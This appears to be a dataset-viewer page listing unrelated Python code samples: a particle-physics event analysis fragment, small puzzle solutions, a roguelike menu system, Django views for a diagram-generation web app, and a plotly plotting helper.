H_Phi = H.Phi()
H_M = H.M()
H_nom = ROOT.TLorentzVector()
H_jesUp = ROOT.TLorentzVector()
H_jesDown = ROOT.TLorentzVector()
H_jerUp = ROOT.TLorentzVector()
H_jerDown = ROOT.TLorentzVector()
H_nom.SetPtEtaPhiM(self.H_pt_nom,H_Eta,H_Phi,H_M)
H_jesUp.SetPtEtaPhiM(self.H_pt_jesUp,H_Eta,H_Phi,H_M)
H_jesDown.SetPtEtaPhiM(self.H_pt_jesDown,H_Eta,H_Phi,H_M)
H_jerUp.SetPtEtaPhiM(self.H_pt_jerUp,H_Eta,H_Phi,H_M)
H_jerDown.SetPtEtaPhiM(self.H_pt_jerDown,H_Eta,H_Phi,H_M)
MET_nom = ROOT.TLorentzVector()
MET_jesUp = ROOT.TLorentzVector()
MET_jesDown = ROOT.TLorentzVector()
MET_jerUp = ROOT.TLorentzVector()
MET_jerDown = ROOT.TLorentzVector()
MET_nom.SetPtEtaPhiM(self.PuppiMET_pt_nom,0.,event.PuppiMET_phi,self.PuppiMET_pt_nom)
MET_jesUp.SetPtEtaPhiM(self.PuppiMET_pt_jesUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesUp)
MET_jesDown.SetPtEtaPhiM(self.PuppiMET_pt_jesDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesDown)
MET_jerUp.SetPtEtaPhiM(self.PuppiMET_pt_jerUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerUp)
MET_jerDown.SetPtEtaPhiM(self.PuppiMET_pt_jerDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerDown)
for ifatjet in idx_fatjet:
if event.FatJet_btagHbb[ifatjet] > 0.3:
self.isBoosted4B = True
self.nJetsNoFatJet = len(jet_tlv_list)
if self.isZtoNN:
self.DPhi = abs(MET_tlv.DeltaPhi(H))
else:
self.DPhi = abs(V.DeltaPhi(H))
self.VH_deltaR = H.DeltaR(V)
jet_list_temp = []
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
if jet_tlv.DeltaR(H) < 0.8:
jet_list_temp.append(ijet)
if len(jet_list_temp) == 1:
idx = jet_list_temp[0]
self.H_chf = event.Jet_chHEF[idx]
self.H_nhf = event.Jet_neHEF[idx]
elif len(jet_list_temp) == 2:
idx1 = jet_list_temp[0]
idx2 = jet_list_temp[1]
pt1 = event.Jet_pt[idx1]
pt2 = event.Jet_pt[idx2]
chf1 = event.Jet_chHEF[idx1]
chf2 = event.Jet_chHEF[idx2]
nhf1 = event.Jet_neHEF[idx1]
nhf2 = event.Jet_neHEF[idx2]
self.H_chf = (chf1*pt1+chf2*pt2)/(pt1+pt2)
self.H_nhf = (nhf1*pt1+nhf2*pt2)/(pt1+pt2)
elif len(jet_list_temp) == 3:
idx1 = jet_list_temp[0]
idx2 = jet_list_temp[1]
idx3 = jet_list_temp[2]
pt1 = event.Jet_pt[idx1]
pt2 = event.Jet_pt[idx2]
pt3 = event.Jet_pt[idx3]
chf1 = event.Jet_chHEF[idx1]
chf2 = event.Jet_chHEF[idx2]
chf3 = event.Jet_chHEF[idx3]
nhf1 = event.Jet_neHEF[idx1]
nhf2 = event.Jet_neHEF[idx2]
nhf3 = event.Jet_neHEF[idx3]
self.H_chf = (chf1*pt1+chf2*pt2+chf3*pt3)/(pt1+pt2+pt3)
self.H_nhf = (nhf1*pt1+nhf2*pt2+nhf3*pt3)/(pt1+pt2+pt3)
for jet_tlv in jet_tlv_list:
if abs(MET_tlv.DeltaPhi(jet_tlv)) < self.MinJetMetDPhi:
self.MinJetMetDPhi = abs(MET_tlv.DeltaPhi(jet_tlv))
for ijet in idx_jet:
if event.Jet_btagDeepB[ijet] > self.MaxJetNoFatJetBTag:
self.MaxJetNoFatJetBTag = event.Jet_btagDeepB[ijet]
if not self.isData:
for igenjet in range(event.nGenJetAK8):
genjetAK8_tlv = ROOT.TLorentzVector()
genjetAK8_tlv.SetPtEtaPhiM(event.GenJetAK8_pt[igenjet], event.GenJetAK8_eta[igenjet], event.GenJetAK8_phi[igenjet], event.GenJetAK8_mass[igenjet])
if H.DeltaR(genjetAK8_tlv) < 0.8:
self.H_hadronflavour = struct.unpack('B',event.GenJetAK8_hadronFlavour[igenjet])[0]
self.H_partonflavour = event.GenJetAK8_partonFlavour[igenjet]
self.btagToolAK4_deep.fillEfficiencies(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep = self.btagToolAK4_deep.getWeight(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep_up = self.btagToolAK4_deep_up.getWeight(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep_down = self.btagToolAK4_deep_down.getWeight(event,idx_jet,fatjet_idx_H)
#search for AK4 jets which match with the subjets from the H
ak4_subjets = []
subjet1 = TLorentzVector()
subjet2 = TLorentzVector()
subjet1_idx = event.FatJet_subJetIdx1[fatjet_idx_H]
subjet2_idx = event.FatJet_subJetIdx2[fatjet_idx_H]
if subjet1_idx>=0. and subjet2_idx>=0.:
subjet1.SetPtEtaPhiM(event.SubJet_pt[subjet1_idx],event.SubJet_eta[subjet1_idx],event.SubJet_phi[subjet1_idx],event.SubJet_mass[subjet1_idx])
subjet2.SetPtEtaPhiM(event.SubJet_pt[subjet2_idx],event.SubJet_eta[subjet2_idx],event.SubJet_phi[subjet2_idx],event.SubJet_mass[subjet2_idx])
for jetid in range(event.nJet):
ak4jet = TLorentzVector()
ak4jet.SetPtEtaPhiM(event.Jet_pt[jetid],event.Jet_eta[jetid],event.Jet_phi[jetid],event.Jet_mass[jetid])
if ak4jet.DeltaR(subjet1)<0.4:
ak4_subjets.append(jetid)
if ak4jet.DeltaR(subjet2)<0.4:
ak4_subjets.append(jetid)
self.btagToolAK8_deep.fillEfficiencies(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep = self.btagToolAK8_deep.getWeight(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep_up = self.btagToolAK8_deep_up.getWeight(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep_down = self.btagToolAK8_deep_down.getWeight(event,ak4_subjets,fatjet_idx_H)
########### X and variables ############
X = V + H
if self.isZtoNN:
X_chs = V_chs + H
self.X_mass_chs = X_chs.M()
if self.runJEC:
X_nom = V + H_nom
X_jesUp = V + H_jesUp
X_jesDown = V + H_jesDown
X_jerUp = V + H_jerUp
X_jerDown = V + H_jerDown
X_MET_nom = MET_nom + H_nom
X_MET_jesUp = MET_jesUp + H_jesUp
X_MET_jesDown = MET_jesDown + H_jesDown
X_MET_jerUp = MET_jerUp + H_jerUp
X_MET_jerDown = MET_jerDown + H_jerDown
self.X_mass_nom = X_nom.M()
self.X_mass_jesUp = X_jesUp.M()
self.X_mass_jesDown = X_jesDown.M()
self.X_mass_jerUp = X_jerUp.M()
self.X_mass_jerDown = X_jerDown.M()
self.X_mass_MET_nom = X_MET_nom.M()
self.X_mass_MET_jesUp = X_MET_jesUp.M()
self.X_mass_MET_jesDown = X_MET_jesDown.M()
self.X_mass_MET_jerUp = X_MET_jerUp.M()
self.X_mass_MET_jerDown = X_MET_jerDown.M()
self.V_pt = V.Pt()
self.V_eta = V.Eta()
self.V_phi = V.Phi()
self.V_mass = V.M()
if self.isZtoNN:
self.V_mass = 0.
self.H_pt = H.Pt()
self.H_eta = H.Eta()
self.H_phi = H.Phi()
self.H_M = H.M()
self.H_mass = event.FatJet_msoftdrop[fatjet_idx_H]
self.X_pt = X.Pt()
self.X_eta = X.Eta()
self.X_phi = X.Phi()
self.X_mass = X.M()
self.H_dbt = event.FatJet_btagHbb[fatjet_idx_H]
self.BtagDeepB = event.FatJet_btagDeepB[fatjet_idx_H]
self.DeepTagMD_H4qvsQCD = event.FatJet_deepTagMD_H4qvsQCD[fatjet_idx_H]
self.DeepTagMD_HbbvsQCD = event.FatJet_deepTagMD_HbbvsQCD[fatjet_idx_H]
self.DeepTagMD_ZHbbvsQCD = event.FatJet_deepTagMD_ZHbbvsQCD[fatjet_idx_H]
self.DeepTagMD_ZbbvsQCD = event.FatJet_deepTagMD_ZbbvsQCD[fatjet_idx_H]
self.DeepTagMD_bbvsLight = event.FatJet_deepTagMD_bbvsLight[fatjet_idx_H]
self.DeepTagMD_WvsQCD = event.FatJet_deepTagMD_WvsQCD[fatjet_idx_H]
self.DeepTagMD_ZvsQCD = event.FatJet_deepTagMD_ZvsQCD[fatjet_idx_H]
self.H_tau21 = fatjet_tau21_list[fatjet_idx_H]
self.H_tau41 = fatjet_tau41_list[fatjet_idx_H]
self.H_tau42 = fatjet_tau42_list[fatjet_idx_H]
self.H_tau31 = fatjet_tau31_list[fatjet_idx_H]
self.H_tau32 = fatjet_tau32_list[fatjet_idx_H]
self.VHDEta = abs(V.Eta() - H.Eta())
if event.FatJet_subJetIdx1[fatjet_idx_H] >= 0:
Hcsv1 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx1[fatjet_idx_H]]
Hdeepcsv1 = event.SubJet_btagDeepB[event.FatJet_subJetIdx1[fatjet_idx_H]]
else:
Hcsv1 = -1.
Hdeepcsv1 = -1.
if event.FatJet_subJetIdx2[fatjet_idx_H] >= 0:
Hcsv2 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx2[fatjet_idx_H]]
Hdeepcsv2 = event.SubJet_btagDeepB[event.FatJet_subJetIdx2[fatjet_idx_H]]
else:
Hcsv2 = -1.
Hdeepcsv2 = -1.
self.H_csv1 = max(Hcsv1,Hcsv2)
self.H_csv2 = min(Hcsv1,Hcsv2)
self.H_deepcsv1 = max(Hdeepcsv1,Hdeepcsv2)
self.H_deepcsv2 = min(Hdeepcsv1,Hdeepcsv2)
if self.year == 2016:
wp_loose = 0.2217
wp_medium = 0.6321
wp_tight = 0.8953
elif self.year == 2017:
wp_loose = 0.1522
wp_medium = 0.4941
wp_tight = 0.8001
elif self.year == 2018:
wp_loose = 0.1241
wp_medium = 0.4184
wp_tight = 0.7527
if self.H_deepcsv2 > wp_loose:
self.isHtobb = True
if self.H_deepcsv1 > wp_medium and self.H_deepcsv2 > wp_loose:
self.isHtobb_ml = True
if self.MaxJetNoFatJetBTag > wp_loose:
self.isMaxBTag_loose = True
if self.MaxJetNoFatJetBTag > wp_medium:
self.isMaxBTag_medium = True
if self.MaxJetNoFatJetBTag > wp_tight:
self.isMaxBTag_tight = True
if self.H_mass != 0.:
self.H_ddt = self.H_tau21 + 0.082 *np.log(self.H_mass*self.H_mass/self.H_pt)
else:
self.H_ddt = -1.
self.X_tmass = np.sqrt(2.*V.Pt()*fatjet_tlv_list[fatjet_idx_H].Pt()*(1.-np.cos(fatjet_tlv_list[fatjet_idx_H].DeltaPhi(V))))
if self.isZtoNN:
self.X_mass = self.X_tmass
else:
self.X_mass = X.M()
if self.X_mass > 750 and self.VH_deltaR > 2:
if self.MinJetMetDPhi>0.5 and self.DPhi>2:
for i,weight in enumerate(nncutflow_list):
self.out.nncutflow_inc.Fill(i,weight)
if self.VHDEta<1.3:
for i,weight in enumerate(eecutflow_list):
self.out.eecutflow_inc.Fill(i,weight)
for i,weight in enumerate(mmcutflow_list):
self.out.mmcutflow_inc.Fill(i,weight)
if self.isZtoEE or self.isZtoMM or self.isZtoNN or self.isTtoEM:
self.fillBranches(event)
return True
|
def lengthOfLongestSubstring(s):
    """Return the length of the longest substring of *s* with no repeated characters.

    Brute force: for every start index, extend right until the first repeated
    character. O(n^2) time, O(n) extra space for the seen-character set.
    """
    max_len = 0
    for i in range(len(s)):
        seen = set()  # characters in the current window s[i:j]
        count = 0
        for j in range(i, len(s)):
            if s[j] in seen:
                break
            # Bug fix: the original called list's .append() on a set,
            # which raises AttributeError on any non-empty input.
            seen.add(s[j])
            count += 1
        max_len = max(max_len, count)
    return max_len


print(lengthOfLongestSubstring('abcabcbb'))
4,396 | 870d260b58c10e0379d66c3b44bc45594ff7d666 |
def solve():
    """Count valid passphrases in ``day4.txt`` (Advent of Code 2017, day 4 part 2).

    A passphrase is valid when no two of its words are anagrams of one
    another; words are compared by their sorted character sequence.

    :return: number of valid lines in the input file.
    """
    valid_passes = 0
    # 'day4.txt' is cwd-relative on every OS; the original '.\day4.txt'
    # only resolved correctly on Windows (literal backslash-d elsewhere,
    # and '\d' is a deprecated escape sequence in modern Python).
    with open('day4.txt') as fp:
        for line in fp.read().strip().splitlines():
            seen = set()
            add = 1
            for word in line.split():
                key = ''.join(sorted(word))
                if key in seen:
                    add = 0
                    break
                seen.add(key)
            valid_passes += add
    return valid_passes


if __name__ == '__main__':
    # Guarded so importing this module no longer triggers file I/O.
    print(solve())
|
4,397 | f1547e0893ce9c4661b546e49f3fc998745390d9 |
from collections import OrderedDict
import tcod.event
from components import Entity, PaperDoll, Brain
from components.enums import Intention
from engine import GameScene
from scenes.list_menu_scene import MenuAction, ListMenuScene
from systems.utilities import set_intention, retract_intention
def run(scene: GameScene):
    """System entry point: handle any pending show-equip-screen intentions for *scene*."""
    handle_show_equip_screen(scene)
def handle_show_equip_screen(scene: GameScene):
    """Open an equipment menu for every entity whose Brain requests it.

    For each brain carrying the SHOW_EQUIP_SCREEN intention, push a
    ListMenuScene showing the entity's equipment slots, then clear the
    intention so it is not handled again next frame.
    """
    brains = [b for b in scene.cm.get(Brain) if b.intention is Intention.SHOW_EQUIP_SCREEN]
    for brain in brains:
        entity = brain.entity
        menu_actions = OrderedDict()
        # Bind `entity` as a default argument: the menu scene outlives this
        # loop iteration, so a late-binding closure over the loop variable
        # would make every pushed menu act on the *last* brain's entity.
        equip_action = MenuAction(
            'e', 'equip',
            lambda slot, entity=entity: set_intention(scene, entity, slot, Intention.EQUIP_SLOT),
        )
        menu_actions[tcod.event.K_e] = equip_action
        equipment_scene = ListMenuScene(
            "Equipment",
            get_slots_query(scene, entity),
            row_builder=row_builder,
            default_action=equip_action,
            menu_actions=menu_actions,
            id_extractor=lambda e: e[1],
            parent_scene=scene
        )
        scene.controller.push_scene(equipment_scene)
        retract_intention(scene, entity)
def get_slots_query(scene: GameScene, entity: int):
    """Return a query that resolves to entity's equipment slots and their equipped items."""
    def query():
        # Re-read the paper doll each call so the menu reflects current state.
        doll: PaperDoll = scene.cm.get_one(PaperDoll, entity)
        rows = []
        for slot_name, equipped_id in doll.get_equipment().items():
            rows.append((slot_name, scene.cm.get_one(Entity, equipped_id)))
        return rows
    return query
def row_builder(entity):
    """Format one (slot name, equipped Entity-or-None) pair as a two-column menu row."""
    slot, item = entity
    if item:
        return [slot, item.name]
    return [slot, '']
|
4,398 | fbbf27f063f6d866e5d0b1210ea9acaebb3bdfb4 | from django.shortcuts import render, get_object_or_404
from django.template.loader import render_to_string
from django.http import JsonResponse
from django.contrib.auth.models import User
from diagen.utils.DiagramCreator import build_diagram_from_code
from diagen.utils.TextConverter import convert_text_to_code
from diagen.utils.extraction.ComponentsExtractor import DEFAULT_COMPONENTS
from django.contrib.auth import authenticate, login, logout
from .models import *
import time
import re
def _build_default_components_text():
text = ''
for c in DEFAULT_COMPONENTS:
text += c + '\n'
return text
# Text preloaded into the component editor (one default component per line).
DEFAULT_COMPONENTS_TEXT = _build_default_components_text()
# Base URL used to build absolute links to generated diagram images.
# NOTE(review): hard-coded to a local dev server — presumably this should
# come from Django settings in production; confirm before deploying.
SERV_FULL_ADDRESS = 'http://127.0.0.1:8000/'
def autentificate_user(request):
    """Validate POSTed credentials and log the user in.

    Responds with JSON: ``{'error': False}`` on success, otherwise
    ``{'error': True, 'error_message': ...}``.
    """
    user = authenticate(
        username=request.POST['username'],
        password=request.POST['password'],
    )
    payload = {'error': False}
    if user is None:
        payload['error'] = True
        payload['error_message'] = 'Неправильный логин или пароль.'
    elif not user.is_active:
        payload['error'] = True
        payload['error_message'] = 'Этот аккаутн заблокирован.'
    else:
        login(request, user)
    return JsonResponse(payload)
def logout_user(request):
    """Log the current user out and serve the anonymous main page."""
    logout(request)
    context = {'components': DEFAULT_COMPONENTS_TEXT}
    return render(request, 'index.html', context)
def registrate_user(request):
    """Create a new user account from POSTed credentials, answering JSON.

    Expects ``username`` and ``password`` in ``request.POST``.
    """
    username = request.POST['username']
    password = request.POST['password']
    try:
        # create_user raises (e.g. on a duplicate username) — the broad
        # catch keeps the view answering JSON instead of a 500 page.
        # Removed the unused `new_user` local; only the side effect matters.
        User.objects.create_user(username, password=password)
    except Exception:
        return JsonResponse({'error': True, 'error_message': "Пользователь с таким именем уже существует."})
    else:
        return JsonResponse({'error': False})
def load_user_data(request):
    """Render the account panel (user's diagrams) as JSON-wrapped HTML."""
    data = {'error': False, 'is_autentificated': False}
    user = request.user
    # NOTE(review): is_authenticated is invoked as a method, matching
    # Django < 1.10; on newer Django it is a property — confirm version.
    if not user.is_authenticated():
        data['error'] = True
        data['error_message'] = 'Пользователь не выполнил вход в аккаунт.'
        return JsonResponse(data)
    diagrams = Diagram.objects.filter(author=user)
    data['html_text'] = render_to_string('account_data.html', {
        "diagrams": diagrams, 'username': user.username
    })
    data['is_autentificated'] = True
    return JsonResponse(data)
def load_user_diagram(request):
    """Return the stored code, image URL and title of one user-owned diagram."""
    data = {'error': False}
    user = request.user
    pk = request.POST['pk']
    if not user.is_authenticated():
        data['error'] = True
        data['error_message'] = 'Пользователь не вошел в систему.'
        return JsonResponse(data)
    diagram = get_object_or_404(Diagram, id=pk)
    if diagram.author.id != user.id:
        # Ownership check: only the author may read the diagram source.
        data['error'] = True
        data['error_message'] = 'Недостаточно прав для данного действия.'
        return JsonResponse(data)
    data['code'] = diagram.text
    data['url'] = diagram.image_url
    data['title'] = diagram.title
    return JsonResponse(data)
def diagen_main(request):
    """Serve the main page with the default component list prefilled."""
    context = {'components': DEFAULT_COMPONENTS_TEXT}
    return render(request, 'index.html', context)
def save_diagram_for_user(request):
    """Create or update the current user's diagram under a POSTed title.

    Expects ``code`` and ``title`` in ``request.POST``.  The diagram image
    is rebuilt from the code and its public URL stored with the record.
    """
    data = {'error': False}
    if request.user.is_authenticated():
        code = request.POST['code']
        file_name = build_diagram_from_code(code)
        url = SERV_FULL_ADDRESS + 'static/diagrams/' + file_name
        title = request.POST['title']
        diagram = Diagram.objects.filter(author=request.user, title=title)
        if diagram.count() == 1:
            # Exactly one diagram with this title: update it in place.
            diagram = diagram[0]
            diagram.image_url = url
            diagram.text = code
            diagram.save()
            data['message'] = 'Диаграмма успешно обновлена.'
        else:
            # None found (or, unexpectedly, several): create a new record.
            new_diagram = Diagram.objects.create(title=title, author=request.user, text=code, image_url=url)
            if new_diagram is not None:  # was `!= None`; identity test is the idiom
                data['message'] = 'Диаграмма успешно сохранена.'
            else:
                data['error'] = True
                data['error_message'] = 'Не получилось сохранить диаграмму.'
    else:
        data['error'] = True
        data['error_message'] = 'Пользователь не вошел в систему.'
    return JsonResponse(data)
def delete_user_diagram(request):
    """Delete one of the requesting user's diagrams by primary key."""
    data = {'error': False}
    user = request.user
    pk = request.POST['pk']
    if not user.is_authenticated():
        data['error'] = True
        data['error_message'] = 'Пользователь не вошел в систему.'
        return JsonResponse(data)
    diagram = get_object_or_404(Diagram, id=pk)
    if diagram.author.id == user.id:
        diagram.delete()
    else:
        # Only the author may delete the diagram.
        data['error'] = True
        data['error_message'] = 'Недостаточно прав для данного действия.'
    return JsonResponse(data)
def get_diagram(request):
    """Render POSTed diagram code to an image and return its URL as JSON."""
    try:
        file_name = build_diagram_from_code(request.POST['code'])
        payload = {'image_url': SERV_FULL_ADDRESS + 'static/diagrams/' + file_name}
    except Exception as exc:
        # Report rendering problems to the client instead of a 500 page.
        payload = {'error': 'true', 'message': str(exc)}
    return JsonResponse(payload)
def generate_diagram(request):
    """Convert free text into diagram code, render it, and answer both as JSON."""
    text = request.POST['text']
    component_types = _parse_text_to_lines(request.POST['component_types'])
    component_names = _parse_text_to_lines(request.POST['component_names'])
    try:
        code = convert_text_to_code(text, component_types, component_names)
        file_name = build_diagram_from_code(code)
        payload = {'code': code, 'image_url': SERV_FULL_ADDRESS + 'static/diagrams/' + file_name}
    except Exception as exc:
        payload = {'error': 'true', 'message': str(exc)}
    return JsonResponse(payload)
def _parse_text_to_lines(text):
    """Split text on newlines and keep only lines containing exactly one word."""
    return [line for line in text.split('\n') if _words_number(line) == 1]
def _words_number(line):
words = re.findall(r"[\w]+", line)
return len(words)
|
4,399 | 8348d353e6fdea77c9c994d541db1420ef57a797 | import numpy as np
import pandas as pd
import plotly.graph_objects as go
from matplotlib import pyplot as plt
def plot_feature_VS_Observed(feature, df, linecolor):
    """
    Plot the 1880-2005 time series of one feature against the observed
    earth temperature and show the interactive figure.

    :param feature: column name of the feature to compare (str)
    :param df: DataFrame holding 'Year', 'Observed' and the feature column
    :param linecolor: plotly line colour for the feature trace (str)
    :return: None; the figure is displayed via fig.show()
    """
    assert isinstance(df, pd.DataFrame)
    assert isinstance(feature, str)
    assert isinstance(linecolor, str)
    figure = go.Figure()
    # Feature trace, fully opaque in the caller-chosen colour.
    figure.add_trace(go.Scatter(x=df['Year'], y=df[feature], name=feature,
                                line_color=linecolor, opacity=1))
    # Observed baseline, semi-transparent grey for visual contrast.
    figure.add_trace(go.Scatter(x=df['Year'], y=df['Observed'], name="Observed",
                                line_color='dimgray', opacity=0.5))
    figure.update_layout(plot_bgcolor='rgba(0, 0, 0,0)',
                         xaxis_title="1880- 2005",
                         yaxis_title="Average Temp (K)",
                         title_text=feature + " vs Observed",
                         showlegend=True)
    figure.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.